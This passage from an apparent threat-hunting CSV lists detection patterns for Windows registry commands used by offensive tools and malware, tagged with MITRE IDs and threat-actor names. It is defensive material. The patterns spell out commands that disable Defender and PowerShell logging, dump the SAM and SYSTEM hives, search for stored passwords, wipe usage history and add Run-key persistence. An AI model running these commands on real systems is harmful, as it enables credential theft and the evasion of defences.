Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56688"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PointAndPrint\""\s\/f\s\/v\sRestrictDriverInstallationToAdministrators\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56690"
"*reg add * EnableModuleLogging /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s.{0,1000}\sEnableModuleLogging\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","56709"
"*reg add * EnableScriptBlockLogging /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s.{0,1000}\sEnableScriptBlockLogging\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","56710"
"*REG ADD *igfxCUIService*",".{0,1000}REG\sADD\s.{0,1000}igfxCUIService.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","#registry","N/A","N/A","N/A","N/A","N/A","N/A","N/A","56722"
"*REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#registry","N/A","10","","N/A","","","","56724"
"*REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#registry","N/A","10","","N/A","","","","56725"
"*REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V*saint.jar*",".{0,1000}REG\sADD\sHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\s\/V.{0,1000}saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","#registry","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","56726"
"*Reg Add 'HKLM\Software\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}Reg\sAdd\s\'HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\'\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56734"
"*REG DELETE ""HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Classes\\Local\sSettings\\Software\\Microsoft\\Windows\\Shell\\MuiCache\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56744"
"*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedPaths"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedPaths\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56745"
"*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedURLs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedURLs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56746"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppBadgeUpdated"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppBadgeUpdated\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56747"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppLaunch"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppLaunch\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56748"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\ShowJumpView"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\ShowJumpView\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56749"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56750"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56751"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56752"
"*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Search\\RecentApps\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56755"
"*REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe""*",".{0,1000}REG\sDELETE\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\"".{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#registry","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","56760"
"*reg delete ""HKLM\SYSTEM\Remote Manipulator System"" /f*",".{0,1000}reg\sdelete\s\""HKLM\\SYSTEM\\Remote\sManipulator\sSystem\""\s\/f.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A","56791"
"*reg delete *HKEY_LOCAL_MACHINE\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* SD *",".{0,1000}reg\sdelete\s.{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\sSD\s.{0,1000}","offensive_tool_keyword","reg","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","N/A","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","#registry","risk of False positive","9","10","N/A","N/A","N/A","N/A","56794"
"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\s\/va\s\/f.{0,1000}","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","#registry","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56796"
"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Security /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\sSecurity\s\/f.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","#registry","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","56797"
"*reg query HKCU /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56803"
"*reg query HKCU /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56805"
"*reg query HKLM /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56813"
"*reg query HKLM /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#registry","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","56816"
"*reg save hklm\sam 1337*",".{0,1000}reg\ssave\shklm\\sam\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","#registry","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56837"
"*reg save hklm\system 1337*",".{0,1000}reg\ssave\shklm\\system\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","#registry","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56842"
"*REG.EXE ADD * /V ThreadingModel /T REG_SZ /D Apartment /F*",".{0,1000}REG\.EXE\sADD\s.{0,1000}\s\/V\sThreadingModel\s\/T\sREG_SZ\s\/D\sApartment\s\/F.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","56848"
"*REG.EXE ADD * /VE /T REG_SZ /D *\msg.dll*",".{0,1000}REG\.EXE\sADD\s.{0,1000}\s\/VE\s\/T\sREG_SZ\s\/D\s.{0,1000}\\msg\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","56849"
"*REG.EXE ADD * /VE /T REG_SZ /D *\msg_x64.dll*",".{0,1000}REG\.EXE\sADD\s.{0,1000}\s\/VE\s\/T\sREG_SZ\s\/D\s.{0,1000}\\msg_x64\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","56850"
"*reg.exe add \""HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"" /v TamperProtection /t REG_DWORD /d 4 /f*",".{0,1000}reg\.exe\sadd\s\\\""HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\sDefender\\\\Features\\\""\s\/v\sTamperProtection\s\/t\sREG_DWORD\s\/d\s4\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","56852"
"*reg.exe delete *HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdFilter\\Instances\\WdFilter Instance* /v Altitude /f*",".{0,1000}reg\.exe\sdelete\s.{0,1000}HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WdFilter\\\\Instances\\\\WdFilter\sInstance.{0,1000}\s\/v\sAltitude\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","56855"
"*reg.exe delete *HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\Instances\WdFilter Instance* /v Altitude /f*",".{0,1000}reg\.exe\sdelete\s.{0,1000}HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdFilter\\Instances\\WdFilter\sInstance.{0,1000}\s\/v\sAltitude\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","56856"
"*reg.exe export HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion*",".{0,1000}reg\.exe\sexport\sHKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#registry","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","56857"
"*reg.exe query hklm\security\policy\secrets*",".{0,1000}reg\.exe\squery\shklm\\security\\policy\\secrets.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#registry","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","56860"
"*reg.exe save HKLM\*",".{0,1000}reg\.exe\ssave\sHKLM\\.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#registry","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","56861"
"*reg.exe save HKLM\SAM sam_*",".{0,1000}reg\.exe\ssave\sHKLM\\SAM\ssam_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#registry","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56863"
"*reg.exe save hklm\sam*",".{0,1000}reg\.exe\ssave\shklm\\sam.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","56864"
